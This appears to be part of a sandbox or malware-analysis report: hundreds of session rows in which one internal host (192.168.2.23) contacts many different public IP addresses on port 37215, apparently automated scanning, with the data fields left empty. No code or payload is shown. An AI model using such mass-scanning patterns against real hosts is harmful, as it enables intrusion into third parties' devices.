                                          11985192.168.2.234152241.101.20.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11986192.168.2.2336478157.99.100.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11987192.168.2.2352912197.17.202.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11988192.168.2.233290841.241.89.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11989192.168.2.2341808157.120.51.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11990192.168.2.2358550197.64.71.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11991192.168.2.233573651.66.121.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11992192.168.2.233699051.191.202.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11993192.168.2.2342802157.144.6.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11994192.168.2.2343620157.187.147.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11995192.168.2.2360424217.86.59.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11996192.168.2.234568441.165.249.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11997192.168.2.235338841.252.213.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11998192.168.2.2358520197.89.143.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11999192.168.2.234017041.184.79.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12000192.168.2.2356072112.75.223.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12001192.168.2.233532825.138.35.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12002192.168.2.2358758197.2.156.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12003192.168.2.2336834197.114.147.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12004192.168.2.2338010197.16.178.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12005192.168.2.234495641.24.188.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12006192.168.2.2334142206.188.248.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12007192.168.2.2355808137.114.233.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12008192.168.2.2349546103.116.83.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12009192.168.2.2359250197.248.161.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12010192.168.2.235299041.181.225.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12011192.168.2.2336818157.218.185.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12012192.168.2.234294841.71.122.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12013192.168.2.233457041.60.146.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12014192.168.2.235009641.194.190.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12015192.168.2.2343032197.209.122.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12016192.168.2.235059873.3.72.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12017192.168.2.234679241.41.183.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12018192.168.2.2347382197.47.59.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12019192.168.2.2347222146.24.54.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12020192.168.2.233471041.109.89.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12021192.168.2.2346824157.29.15.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12022192.168.2.233747641.186.216.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12023192.168.2.2338690157.143.195.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12024192.168.2.2336532197.208.244.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12025192.168.2.2343822197.162.117.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12026192.168.2.2335808157.23.27.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12027192.168.2.235331667.198.164.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12028192.168.2.234951841.43.202.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12029192.168.2.2335078197.237.160.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12030192.168.2.2333156157.145.133.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12031192.168.2.2360234157.196.163.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12032192.168.2.2351730197.155.107.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12033192.168.2.2340968182.31.246.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12034192.168.2.2352130158.222.167.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12035192.168.2.2338250157.204.208.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12036192.168.2.2356992197.159.215.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12037192.168.2.235373241.249.53.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12038192.168.2.234679841.83.32.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12039192.168.2.234520082.189.43.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12040192.168.2.2339072157.198.85.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12041192.168.2.234859041.199.59.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12042192.168.2.234397841.199.165.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12043192.168.2.2339128197.41.89.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12044192.168.2.2349160129.116.45.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12045192.168.2.2353920197.155.139.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12046192.168.2.2344854157.203.247.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12047192.168.2.2349678157.216.105.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12048192.168.2.234176241.47.138.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12049192.168.2.23581282.54.105.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12050192.168.2.2338252197.79.16.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12051192.168.2.234902841.227.160.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12052192.168.2.23544085.12.90.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12053192.168.2.233980841.222.235.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12054192.168.2.2351744197.183.193.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12055192.168.2.2355682197.212.210.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12056192.168.2.2338164157.190.128.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12057192.168.2.2342224157.79.111.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12058192.168.2.235504441.82.0.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12059192.168.2.2334224197.223.199.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12060192.168.2.2334098157.255.171.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12061192.168.2.235925241.50.139.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12062192.168.2.2344290157.85.242.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12063192.168.2.233302841.57.228.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12064192.168.2.2354810197.254.167.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12065192.168.2.233929841.49.213.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12066192.168.2.2340570197.177.210.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12067192.168.2.2339834197.241.24.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12068192.168.2.2356034197.188.78.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12069192.168.2.2354354197.34.208.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12070192.168.2.235015841.202.53.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12071192.168.2.2344870207.3.57.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12072192.168.2.2338016109.211.18.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12073192.168.2.234558441.67.212.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12074192.168.2.2355504103.89.39.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12075192.168.2.235886441.249.60.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12076192.168.2.2354558157.128.161.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12077192.168.2.2346404197.86.145.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12078192.168.2.2344416129.163.251.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12079192.168.2.234355041.234.102.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12080192.168.2.2349206157.238.151.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12081192.168.2.2350310157.244.203.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12082192.168.2.2333878197.200.125.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12083192.168.2.2356716197.76.46.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12084192.168.2.2358982197.36.100.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12085192.168.2.2341246157.224.36.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12086192.168.2.234087641.140.202.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12087192.168.2.2355710157.210.107.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12088192.168.2.2351354175.215.165.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12089192.168.2.235112041.37.53.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12090192.168.2.234033625.246.253.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12091192.168.2.235106641.246.232.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12092192.168.2.2358512103.108.216.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12093192.168.2.2359646187.188.25.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12094192.168.2.2359912197.63.85.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12095192.168.2.2342268131.6.9.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12096192.168.2.2352052207.116.183.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12097192.168.2.2353866197.179.214.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12098192.168.2.2343110157.51.183.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12099192.168.2.2357024197.224.128.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12100192.168.2.2348442197.167.119.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12101192.168.2.2351382118.166.177.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12102192.168.2.2356012181.0.193.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12103192.168.2.2335920122.157.167.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12104192.168.2.2346618157.37.187.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12105192.168.2.235067641.206.9.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12106192.168.2.235088641.237.160.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12107192.168.2.233850249.179.25.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12108192.168.2.2353228197.179.81.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12109192.168.2.2356054157.252.246.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12110192.168.2.2335260157.138.58.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12111192.168.2.234268213.216.64.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12112192.168.2.2351730157.160.187.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12113192.168.2.234172841.36.183.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12114192.168.2.2342068157.170.41.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12115192.168.2.2343936174.134.91.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12116192.168.2.233665441.120.133.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12117192.168.2.2345200197.16.134.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12118192.168.2.234341420.229.248.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12119192.168.2.2341400157.232.164.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12120192.168.2.233306441.239.37.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12121192.168.2.234944641.248.219.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12122192.168.2.234311641.243.219.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12123192.168.2.236029054.198.162.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12124192.168.2.2354700197.200.223.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12125192.168.2.2359394157.20.23.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12126192.168.2.2357480189.101.199.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12127192.168.2.2349332157.76.226.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12128192.168.2.2351612157.47.40.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12129192.168.2.235531641.60.169.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12130192.168.2.2354630157.130.113.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12131192.168.2.2347648157.216.237.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12132192.168.2.2346060157.132.207.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12133192.168.2.234206641.123.99.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12134192.168.2.2338212204.172.78.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12135192.168.2.2342622197.80.246.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12136192.168.2.2356930165.37.64.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12137192.168.2.2344130165.146.49.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12138192.168.2.234699841.172.250.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12139192.168.2.235403041.38.51.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12140192.168.2.2355162197.165.92.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12141192.168.2.2342126157.217.162.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12142192.168.2.2335820197.56.207.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12143192.168.2.235519241.162.207.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12144192.168.2.2333564157.158.186.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12145192.168.2.233637468.226.42.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12146192.168.2.235028245.12.164.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12147192.168.2.2357728197.236.6.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12148192.168.2.234728841.197.111.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12149192.168.2.2343216197.206.80.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12150192.168.2.233316241.141.42.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12151192.168.2.235915041.13.178.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12152192.168.2.2355382139.174.40.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12153192.168.2.2356346157.117.130.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12154192.168.2.235967241.14.48.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12155192.168.2.2340414197.52.159.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12156192.168.2.2341462197.5.254.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12157192.168.2.234395241.218.49.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12158192.168.2.2338542157.209.123.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12159192.168.2.2357726157.211.154.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12160192.168.2.2354418179.133.106.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12161192.168.2.235372841.189.175.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12162192.168.2.233428441.41.76.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12163192.168.2.235437441.26.247.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12164192.168.2.2347736197.207.113.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12165192.168.2.2351570196.246.47.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12166192.168.2.234285446.224.77.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12167192.168.2.2340870206.12.36.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12168192.168.2.2360128157.171.101.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12169192.168.2.2355018197.216.167.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12170192.168.2.2337768157.236.252.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12171192.168.2.2347232157.222.236.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12172192.168.2.2340442197.132.87.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12173192.168.2.2335694157.197.238.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12174192.168.2.2359402178.236.59.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12175192.168.2.2351354101.130.108.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12176192.168.2.2354284197.145.111.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12177192.168.2.2346442197.159.166.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12178192.168.2.235530841.95.43.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12179192.168.2.2349256157.95.155.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12180192.168.2.235185668.0.167.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12181192.168.2.2338594157.79.46.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12182192.168.2.2348852176.29.147.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12183192.168.2.2338846112.4.221.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12184192.168.2.2351270168.223.126.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12185192.168.2.2342150157.110.52.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12186192.168.2.234994241.166.36.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12187192.168.2.235213878.254.190.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12188192.168.2.2358744197.196.59.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12189192.168.2.235076441.200.111.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12190192.168.2.234101041.173.230.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12191192.168.2.2340196157.162.211.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12192192.168.2.2356896157.207.239.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12193192.168.2.235722441.120.66.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12194192.168.2.2346722157.114.154.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12195192.168.2.2334374193.128.15.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12196192.168.2.2359294197.249.130.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12197192.168.2.2343826167.114.157.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12198192.168.2.2349368197.88.40.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12199192.168.2.233620841.116.219.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12200192.168.2.235194614.75.39.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12201192.168.2.2335720197.97.126.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12202192.168.2.2347840197.182.122.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12203192.168.2.234260690.188.27.16637215
                                          TimestampBytes transferredDirectionData


